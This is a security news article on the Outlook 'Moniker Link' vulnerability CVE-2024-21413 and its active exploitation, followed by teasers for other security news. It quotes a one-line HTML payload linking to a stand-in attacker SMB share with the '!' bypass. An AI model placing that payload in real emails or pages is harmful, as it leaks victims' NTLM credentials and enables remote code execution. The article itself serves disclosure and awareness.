
The warning refers to the CVE-2024-21413 Microsoft Outlook Improper Input Validation Vulnerability discovered last year by Check Point Research experts. The bug affects a number of Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019.
The security hole results in remote code execution when an e-mail with malicious links is opened using a vulnerable version of Microsoft Outlook. Successful exploitation of this vulnerability enables an attacker to bypass the Office Protected View and open malicious Office files in edit mode.
Such attacks can result in the leaking of local NTLM credentials and remote code execution (RCE).
Importantly, the Preview Pane can also be used as an attack vector since CVE-2024-21413 can be exploited when malicious documents are previewed.
The vulnerability, dubbed Moniker Link by Check Point Research analysts, makes it possible to bypass Outlook protection against malicious links embedded in emails by using the file:/
construct. All the attacker has to do is add a !
character to the URL that points to an attacker-controlled server.
The exclamation mark is added immediately after the document extension along with arbitrary text (Check Point Research used the word “something” in its example):
<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>
Such a link bypasses Outlook restrictions, and Outlook gains access to the remote resource \\\
when the link is clicked. Importantly, no warnings or errors are displayed.
According to the experts, the vulnerability is related to the MkParseDisplayName API and can affect other software that uses it.
As CISA reports, the security hole is actively exploited and has been added to the Known Exploited Vulnerabilities (KEV) catalog.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” – CISA.

2025.02.28 — Qualcomm extends support for Android devices to 8 years
Qualcomm Technologies announced its collaboration with Google with the purpose to provide extended support for OEM devices running on company's flagship chipsets. This partnership will…
Full article →
2025.01.25 — 18,000 script kiddies have been infected with backdoor via XWorm RAT builder
According to CloudSEK analysts, malefactors attack novice hackers using a fake malware builder. Script kiddies' systems become infected with a backdoor that steals data and subsequently…
Full article →
2025.02.01 — Critical RCE vulnerability fixed in Cacti
A critical vulnerability has been discovered in the open-source Cacti framework: it enables an authenticated attacker to remotely execute arbitrary code. Vulnerability's ID is CVE-2025-22604; its…
Full article →
2025.04.23 — Improper authentication control vulnerability affects ASUS routers with AiCloud
ASUSTeK Computer Inc. fixed an improper authentication control vulnerability in routers with AiCloud. The bug allows remote attackers to perform unauthorized actions on vulnerable devices. The issue…
Full article →
2025.04.15 — Hackers exploit authentication bypass bug in OttoKit WordPress plugin
Hackers exploit an authentication bypass vulnerability in the OttoKit (formerly SureTriggers) WordPress plugin used by more than 100,000 websites. First attacks were recorded just…
Full article →
2025.04.16 — Android devices will restart every three days to protect user data
Google introduces a new security feature for Android devices: locked and unused devices will be automatically restarted after three days of inactivity to return their memory to an…
Full article →
2025.02.14 — 12,000 Kerio Control firewalls remain vulnerable to RCE
Security experts report that more than 12,000 GFI Kerio Control firewall instances remain vulnerable to the critical RCE vulnerability CVE-2024-52875, which was fixed…
Full article →
2025.03.20 — 8,000 vulnerabilities identified in WordPress ecosystem in 2024
According to Patchstack, world's #1 WordPress vulnerability intelligence provider, 7,966 new vulnerabilities were identified in the WordPress ecosystem in 2024; most of these bugs affected plugins…
Full article →
2025.04.10 — April updates released by Microsoft cause issues with Windows Hello
Microsoft warns that some Windows users who have installed the April updates might be unable to login to their Windows services using Windows Hello facial recognition…
Full article →
2025.01.23 — Fake Telegram CAPTCHA forces users to run malicious PowerShell scripts
Hackers used the news of Ross Ulbricht pardoning to lure users to a rogue Telegram channel where they are tricked into running malicious PowerShell code. This…
Full article →